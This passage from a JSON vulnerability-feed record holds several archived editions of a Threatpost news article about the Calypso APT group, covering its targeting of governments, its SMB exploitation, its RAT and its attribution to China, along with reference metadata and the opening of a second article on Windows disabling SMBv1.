and the NSA hacking tools [EternalBlue and EternalRomance](<https://threatpost.com/chinas-apt3-pilfers-cyberweapons-nsa/148086/>)), all in an effort to move laterally. The goal is to reach endpoints on a targeted organization\u2019s LAN and steal confidential data. 
The APT also uses a variety of legitimate administrative tools, which helps it stay under the radar, PT pointed out.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\n\u201cThese attacks succeeded largely because most of the utilities the group uses to move inside the network are widely used by the specialists everywhere for network administration,\u201d said Denis Kuvshinov, lead specialist in threat analysis at Positive Technologies, via email. \u201cThe group used publicly available utilities and exploit tools.\u201d\n\nThe Calypso RAT (it\u2019s unclear whether this is named after the Greek goddess from the Odyssey, the fruit drink, the island backbeat familiar from the music world or something else altogether) is a custom affair. It contains a dropper for first-stage infection, which then extracts further payloads in the form of a Windows batch script (BAT) for installation. The BAT file contains variables that can be invoked to have it save files, modify services and modify registry keys.\n\nPT analysis showed that the dropper next executes shellcode, which provides the interface for communicating with the command-and-control (C2) server and for downloading various modules. Once the C2 connection is made, the shellcode sends the C2 information about the infected computer, via TCP and SSL (such as computer name, current date, OS version, 32-bit vs. 64-bit OS and CPU, and IP addresses on network interfaces and their MAC addresses).\n\nCalypso RAT next can execute a total of 12 commands in the form of modules, each of which is self-contained and has two communication pipelines: One for transmitting data from the module to C2, and the other for receiving data from C2. 
Each module has a unique ID assigned by C2.\n\nAmong the commands are directions to launch three threads.\n\n\u201cOne is a heartbeat sending an empty packet to C2 every 54 seconds,\u201d explained PT, in the analysis. \u201cThe other processes and executes commands from C2. As for the third thread, we could not figure out its purpose, because the lines implementing its functionality were removed from the code. All we can tell is that this thread was supposed to \u2018wake up\u2019 every 54 seconds, just like the first one.\u201d\n\nIn some attacks, the backdoor has also fetched executables, including the FlyingDutchman malware, which includes functions such as screenshot capture, remote shell, and file system operations.\n\nAs for attribution, PT said that its forensics indicate that the discovered APT group is likely to be of Asian origin and is Chinese-speaking. The firm reached this conclusion because in some of the attacks, the hackers accidentally disclosed their real IP addresses, which belonged to Chinese providers.\n\n\u201cThe IP address belongs to China Telecom,\u201d according to a PT analysis [launched Thursday](<https://www.ptsecurity.com/ww-en/analytics/calypso-apt-2019/#id5>). \u201cWe believe the attackers could have been careless and set up the proxy server incorrectly, thus disclosing their real IP address. This is the first piece of evidence supporting the Asian origins of the group.\u201d\n\nFurther, the researchers noted that in one of the attacks the group used [PlugX malware](<https://threatpost.com/plugx-go-to-malware-for-targeted-attacks-more-prominent-than-ever/110936/>) \u2014 traditionally used by many Chinese APT groups. 
Calypso also used the Byeby trojan, which was involved in the China-linked [SongXY malware campaign](<https://www.ptsecurity.com/ww-en/analytics/cybersecurity-threatscape-q4-2017/>) in 2017.\n\n\u201cThe group has several successful hacks to its credit, but still makes mistakes allowing us to guess its origins,\u201d PT concluded. \u201cAll data given here suggests that the group originates from Asia and uses malware not previously described by anyone\u2026We keep monitoring the activities of Calypso closely and expect the group will attack again.\u201d\n\n_**What are the top mistakes leading to data breaches at modern enterprises? Find out: Join experts from SpyCloud and Threatpost senior editor Tara Seals on our upcoming free **_[_**Threatpost webinar**_](<https://attendee.gotowebinar.com/register/3127445778613605890?source=ART>)_**, \u201cTrends in Fortune 1000 Breach Exposure.\u201d **_[_**Click here to register**_](<https://attendee.gotowebinar.com/register/3127445778613605890?source=ART>)_**.**_\n", "published": "2019-10-31T19:55:02", "modified": "2019-10-31T19:55:02", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "https://threatpost.com/calypso-apt-target-governments/149773/", "reporter": "Tara Seals", "references": ["https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010", "https://threatpost.com/fin6-target-ecommerce/147847/", "https://threatpost.com/chinas-apt3-pilfers-cyberweapons-nsa/148086/", "https://threatpost.com/newsletter-sign/", "https://www.ptsecurity.com/ww-en/analytics/calypso-apt-2019/#id5", "https://threatpost.com/plugx-go-to-malware-for-targeted-attacks-more-prominent-than-ever/110936/", "https://www.ptsecurity.com/ww-en/analytics/cybersecurity-threatscape-q4-2017/", "https://attendee.gotowebinar.com/register/3127445778613605890?source=ART", "https://attendee.gotowebinar.com/register/3127445778613605890?source=ART"], "cvelist": ["CVE-2017-0143"], "lastseen": "2020-03-03T11:32:31", 
"history": [], "viewCount": 36, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "threatpost", "idList": ["THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3"]}, {"type": "exploitdb", "idList": ["EDB-ID:43970", "EDB-ID:41987", "EDB-ID:41891", "EDB-ID:47456"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "zdt", "idList": ["1337DAY-ID-29702", "1337DAY-ID-33895", "1337DAY-ID-27752", "1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146236", "PACKETSTORM:142548", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:156196"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", 
"RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA10979"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "MS17-010.NASL"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2020-03-03T11:32:31"}, "score": {"value": 7.0, "vector": "NONE", "modified": "2020-03-03T11:32:31"}}, "objectVersion": "1.4"}, "lastseen": "2020-03-03T11:32:31", "differentElements": ["modified", "published"], "edition": 4}, {"bulletin": {"id": "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "hash": "02cf3e03d7cf732490d89cdc2b4a219a", "type": "threatpost", "bulletinFamily": "info", "title": "Calypso APT Emerges from the Shadows to Target Governments", "description": "A newly discovered APT group, dubbed Calypso after a custom malware RAT that it uses, has been targeting state institutions in six different countries since 2016.\n\nGovernment organizations in India (34 percent), Brazil and Kazakhstan (18 percent respectively), Russia and Thailand (12 percent respectively) and Turkey (6 percent) have all been successfully infiltrated at some point, according to analysts at Positive Technologies (PT), which first spotted the group in March.\n\nTo that point, the typical _modus operandi_ of the threat actors consists of infiltrating the network perimeter by exploiting a Windows 
SMB remote code-execution vulnerability ([CVE-2017-0143](<https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010>), one of the SMB flaws Microsoft patched in security bulletin MS17-010 in 2017) or by using stolen credentials. Once inside the network, the group injects a backdoor RAT program \u2013 the Calypso web shell \u2013 that it uses to execute commands and upload utilities and malware (including well-known tools like [Mimikatz](<https://threatpost.com/fin6-target-ecommerce/147847/>), and the NSA hacking tools [EternalBlue and EternalRomance](<https://threatpost.com/chinas-apt3-pilfers-cyberweapons-nsa/148086/>)), all in an effort to move laterally. The goal is to reach endpoints on a targeted organization\u2019s LAN and steal confidential data. The APT also uses a variety of legitimate administrative tools, which helps it stay under the radar, PT pointed out.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\n\u201cThese attacks succeeded largely because most of the utilities the group uses to move inside the network are widely used by the specialists everywhere for network administration,\u201d said Denis Kuvshinov, lead specialist in threat analysis at Positive Technologies, via email. \u201cThe group used publicly available utilities and exploit tools.\u201d\n\nThe Calypso RAT (it\u2019s unclear whether this is named after the Greek goddess from the Odyssey, the fruit drink, the island backbeat familiar from the music world or something else altogether) is a custom affair. It contains a dropper for first-stage infection, which then extracts further payloads in the form of a Windows batch script (BAT) for installation. 
The BAT file contains variables that can be invoked to have it save files, modify services and modify registry keys.\n\nPT analysis showed that the dropper next executes shellcode, which provides the interface for communicating with the command-and-control (C2) server and for downloading various modules. Once the C2 connection is made, the shellcode sends the C2 information about the infected computer, via TCP and SSL (such as computer name, current date, OS version, 32-bit vs. 64-bit OS and CPU, and IP addresses on network interfaces and their MAC addresses).\n\nCalypso RAT next can execute a total of 12 commands in the form of modules, each of which is self-contained and has two communication pipelines: One for transmitting data from the module to C2, and the other for receiving data from C2. Each module has a unique ID assigned by C2.\n\nAmong the commands are directions to launch three threads.\n\n\u201cOne is a heartbeat sending an empty packet to C2 every 54 seconds,\u201d explained PT, in the analysis. \u201cThe other processes and executes commands from C2. As for the third thread, we could not figure out its purpose, because the lines implementing its functionality were removed from the code. All we can tell is that this thread was supposed to \u2018wake up\u2019 every 54 seconds, just like the first one.\u201d\n\nIn some attacks, the backdoor has also fetched executables, including the FlyingDutchman malware, which includes functions such as screenshot capture, remote shell, and file system operations.\n\nAs for attribution, PT said that its forensics indicate that the discovered APT group is likely to be of Asian origin and is Chinese-speaking. 
The firm reached this conclusion because in some of the attacks, the hackers accidentally disclosed their real IP addresses, which belonged to Chinese providers.\n\n\u201cThe IP address belongs to China Telecom,\u201d according to a PT analysis [launched Thursday](<https://www.ptsecurity.com/ww-en/analytics/calypso-apt-2019/#id5>). \u201cWe believe the attackers could have been careless and set up the proxy server incorrectly, thus disclosing their real IP address. This is the first piece of evidence supporting the Asian origins of the group.\u201d\n\nFurther, the researchers noted that in one of the attacks the group used [PlugX malware](<https://threatpost.com/plugx-go-to-malware-for-targeted-attacks-more-prominent-than-ever/110936/>) \u2014 traditionally used by many Chinese APT groups. Calypso also used the Byeby trojan, which was involved in the China-linked [SongXY malware campaign](<https://www.ptsecurity.com/ww-en/analytics/cybersecurity-threatscape-q4-2017/>) in 2017.\n\n\u201cThe group has several successful hacks to its credit, but still makes mistakes allowing us to guess its origins,\u201d PT concluded. \u201cAll data given here suggests that the group originates from Asia and uses malware not previously described by anyone\u2026We keep monitoring the activities of Calypso closely and expect the group will attack again.\u201d\n\n_**What are the top mistakes leading to data breaches at modern enterprises? 
Find out: Join experts from SpyCloud and Threatpost senior editor Tara Seals on our upcoming free **_[_**Threatpost webinar**_](<https://attendee.gotowebinar.com/register/3127445778613605890?source=ART>)_**, \u201cTrends in Fortune 1000 Breach Exposure.\u201d **_[_**Click here to register**_](<https://attendee.gotowebinar.com/register/3127445778613605890?source=ART>)_**.**_\n", "published": "2019-10-31T18:55:02", "modified": "2019-10-31T18:55:02", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "https://threatpost.com/calypso-apt-target-governments/149773/", "reporter": "Tara Seals", "references": ["https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010", "https://threatpost.com/fin6-target-ecommerce/147847/", "https://threatpost.com/chinas-apt3-pilfers-cyberweapons-nsa/148086/", "https://threatpost.com/newsletter-sign/", "https://www.ptsecurity.com/ww-en/analytics/calypso-apt-2019/#id5", "https://threatpost.com/plugx-go-to-malware-for-targeted-attacks-more-prominent-than-ever/110936/", "https://www.ptsecurity.com/ww-en/analytics/cybersecurity-threatscape-q4-2017/", "https://attendee.gotowebinar.com/register/3127445778613605890?source=ART", "https://attendee.gotowebinar.com/register/3127445778613605890?source=ART"], "cvelist": ["CVE-2017-0143"], "lastseen": "2020-03-08T11:43:54", "history": [], "viewCount": 36, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "myhack58", 
"idList": ["MYHACK58:62201786371"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "threatpost", "idList": ["THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:13B65410050EE2481FFF6529E376C3DE", "THREATPOST:B991F2CF870C98BD40B817DE3CDF52A0", "THREATPOST:7D1D823549046978FD52257C68DF7801"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND"]}, {"type": "exploitdb", "idList": ["EDB-ID:43970", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:41987"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:156196", "PACKETSTORM:146236", "PACKETSTORM:142181", "PACKETSTORM:154690"]}, {"type": "zdt", "idList": ["1337DAY-ID-27786", "1337DAY-ID-33895", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-29702", "1337DAY-ID-27613"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "nessus", 
"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2020-03-08T11:43:54", "rev": 2}, "score": {"value": 7.0, "vector": "NONE", "modified": "2020-03-08T11:43:54", "rev": 2}}, "objectVersion": "1.4"}, "lastseen": "2020-03-08T11:43:54", "differentElements": ["cvelist"], "edition": 5}, {"bulletin": {"id": "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "hash": "c914fbd7f31ef2bedc9090b41c9c6c63", "type": "threatpost", "bulletinFamily": "info", "title": "Calypso APT Emerges from the Shadows to Target Governments", "description": "A newly discovered APT group, dubbed Calypso after a custom malware RAT that it uses, has been targeting state institutions in six different countries since 2016.\n\nGovernment organizations in India (34 percent), Brazil and Kazakhstan (18 percent respectively), Russia and Thailand (12 percent respectively) and Turkey (6 percent) have all been successfully infiltrated at some point, according to analysts at Positive Technologies (PT), which first spotted the group in March.\n\nTo that point, the typical _modus operandi_ of the threat actors consists of infiltrating the network perimeter by exploiting a Windows SMB remote code-execution vulnerability ([CVE-2017-0143](<https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010>)) or by using stolen credentials. Once inside the network, the group injects a backdoor RAT program \u2013 the Calypso web shell \u2013 that it uses to execute commands and upload utilities and malware (including well-known tools like [Mimikatz](<https://threatpost.com/fin6-target-ecommerce/147847/>), and the NSA hacking tools [EternalBlue and EternalRomance](<https://threatpost.com/chinas-apt3-pilfers-cyberweapons-nsa/148086/>)), all in an effort to move laterally. 
The goal is to reach endpoints on a targeted organization\u2019s LAN and steal confidential data. The APT also uses a variety of legitimate administrative tools, which helps it stay under the radar, PT pointed out.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\n\u201cThese attacks succeeded largely because most of the utilities the group uses to move inside the network are widely used by the specialists everywhere for network administration,\u201d said Denis Kuvshinov, lead specialist in threat analysis at Positive Technologies, via email. \u201cThe group used publicly available utilities and exploit tools.\u201d\n\nThe Calypso RAT (it\u2019s unclear whether this is named after the Greek goddess from the Odyssey, the fruit drink, the island backbeat familiar from music world or something else altogether) is a custom affair. It contains a dropper for first-stage infection, which then extracts further payloads in the form of a Windows batch script (BAT) for installation. The BAT file contains variables that can be invoked to have it save files, modify services and modify registry keys.\n\nPT analysis showed that the dropper next executes shellcode, which provides the interface for communicating with the command-and-control (C2) server and for downloading various modules. Once the C2 connection is made, the shellcode sends the C2 information about the infected computer, via TCP and SSL (such as computer name, current date, OS version, 32-bit vs. 64-bit OS and CPU, and IP addresses on network interfaces and their MAC addresses).\n\nCalypso RAT next can execute a total of 12 commands in the form of modules, each of which is self-contained and has two communication pipelines: One for transmitting data from the module to C2, and the other for receiving data from C2. 
Each module has a unique ID assigned by C2.\n\nAmong the commands are directions to launch three threads.\n\n\u201cOne is a heartbeat sending an empty packet to C2 every 54 seconds,\u201d explained PT, in the analysis. \u201cThe other processes and executes commands from C2. As for the third thread, we could not figure out its purpose, because the lines implementing its functionality were removed from the code. All we can tell is that this thread was supposed to \u2018wake up\u2019 every 54 seconds, just like the first one.\u201d\n\nIn some attacks, the backdoor has also fetched executables, including the FlyingDutchman malware, which includes functions such as screenshot capture, remote shell, and file system operations.\n\nAs for attribution, PT said that its forensics indicate that the discovered APT group is likely to be of Asian origin and is Chinese-speaking. The firm reached this conclusion because in some of the attacks, the hackers accidentally disclosed their real IP addresses, which belonged to Chinese providers.\n\n\u201cThe IP address belongs to China Telecom,\u201d according to a PT analysis [launched Thursday](<https://www.ptsecurity.com/ww-en/analytics/calypso-apt-2019/#id5>). \u201cWe believe the attackers could have been careless and set up the proxy server incorrectly, thus disclosing their real IP address. This is the first piece of evidence supporting the Asian origins of the group.\u201d\n\nFurther, the researchers noted that in one of the attacks the group used [PlugX malware](<https://threatpost.com/plugx-go-to-malware-for-targeted-attacks-more-prominent-than-ever/110936/>) \u2014 traditionally used by many Chinese APT groups. 
Calypso also used the Byeby trojan, which was involved in the China-linked [SongXY malware campaign](<https://www.ptsecurity.com/ww-en/analytics/cybersecurity-threatscape-q4-2017/>) in 2017.\n\n\u201cThe group has several successful hacks to its credit, but still makes mistakes allowing us to guess its origins,\u201d PT concluded. \u201cAll data given here suggests that the group originates from Asia and uses malware not previously described by anyone\u2026We keep monitoring the activities of Calypso closely and expect the group will attack again.\u201d\n\n_**What are the top mistakes leading to data breaches at modern enterprises? Find out: Join experts from SpyCloud and Threatpost senior editor Tara Seals on our upcoming free **_[_**Threatpost webinar**_](<https://attendee.gotowebinar.com/register/3127445778613605890?source=ART>)_**, \u201cTrends in Fortune 1000 Breach Exposure.\u201d **_[_**Click here to register**_](<https://attendee.gotowebinar.com/register/3127445778613605890?source=ART>)_**.**_\n", "published": "2019-10-31T18:55:02", "modified": "2019-10-31T18:55:02", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "https://threatpost.com/calypso-apt-target-governments/149773/", "reporter": "Tara Seals", "references": ["https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010", "https://threatpost.com/fin6-target-ecommerce/147847/", "https://threatpost.com/chinas-apt3-pilfers-cyberweapons-nsa/148086/", "https://threatpost.com/newsletter-sign/", "https://www.ptsecurity.com/ww-en/analytics/calypso-apt-2019/#id5", "https://threatpost.com/plugx-go-to-malware-for-targeted-attacks-more-prominent-than-ever/110936/", "https://www.ptsecurity.com/ww-en/analytics/cybersecurity-threatscape-q4-2017/", "https://attendee.gotowebinar.com/register/3127445778613605890?source=ART", "https://attendee.gotowebinar.com/register/3127445778613605890?source=ART"], "cvelist": ["CVE-2017-0143", "CVE-2020-0688"], "lastseen": 
"2020-04-08T11:38:06", "history": [], "viewCount": 36, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143", "CVE-2020-0688"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "threatpost", "idList": ["THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:FB34BB37115EDA1532715EDC5BCED9C2", "THREATPOST:C70A342E0B6FAB078006E6B3DF8178A5", "THREATPOST:B991F2CF870C98BD40B817DE3CDF52A0", "THREATPOST:5329E007F295711D2BA9C149269B7B5A", "THREATPOST:3D7ABC1C5B95C6E6C4D4530DD377DAC6", "THREATPOST:13B65410050EE2481FFF6529E376C3DE", "THREATPOST:3BB4E0E1572CB407D8E229113D737B67", "THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:36B379AB7961800661672D1834D06918", "THREATPOST:85C6E4DB7228933D258699492AA2C713", "THREATPOST:62A9CA4CC9F9EE48883992304A29438C"]}], "modified": "2020-04-08T11:38:06", "rev": 2}, "score": {"value": 5.0, "vector": "NONE", "modified": "2020-04-08T11:38:06", "rev": 2}}, "objectVersion": "1.4"}, "lastseen": "2020-04-08T11:38:06", "differentElements": ["cvelist"], "edition": 6}], "viewCount": 41, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0177"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, 
{"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "threatpost", "idList": ["THREATPOST:13B65410050EE2481FFF6529E376C3DE", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:B991F2CF870C98BD40B817DE3CDF52A0"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:146236", "PACKETSTORM:142548"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:43970", "EDB-ID:41891"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-27786"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "nessus", "idList": ["700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM", "MS17-010.NASL"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": 
"kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}], "modified": "2020-04-09T11:37:03", "rev": 2}, "score": {"value": 7.0, "vector": "NONE", "modified": "2020-04-09T11:37:03", "rev": 2}}, "objectVersion": "1.5", "_object_type": "robots.models.threatpost.ThreatpostBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.threatpost.ThreatpostBulletin"], "immutableFields": [], "cvss2": {}, "cvss3": {}}, {"id": "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "hash": "a4260822387bc7aa1a30cfeb75af497f", "type": "threatpost", "bulletinFamily": "info", "title": "SMBv1 to be Disabled in Windows Fall Creators Update", "description": "The crusty SMBv1 file-sharing protocol, abused by a [NSA exploit](<https://threatpost.com/leaked-nsa-exploit-spreading-ransomware-worldwide/125654/>) last month that spread [WannaCry](<https://threatpost.com/someone-failed-to-contain-wannacry/126335/>), will be removed from Windows 10 starting with the upcoming Redstone 3 update.\n\n\u201cWe can confirm that SMBv1 is being removed for Redstone 3,\u201d a Microsoft representative told Threatpost.\n\nRedstone 3, a code-name for the Fall Creators Update, will begin the phasing out of SMBv1, a plan that reportedly has been in the works for years and is not a reaction to the EternalBlue exploit, nor WannaCry. It is due in September.\n\nSMBv1, short for the Server Message Block protocol, provides shared access to Windows file and print services on a local network. 
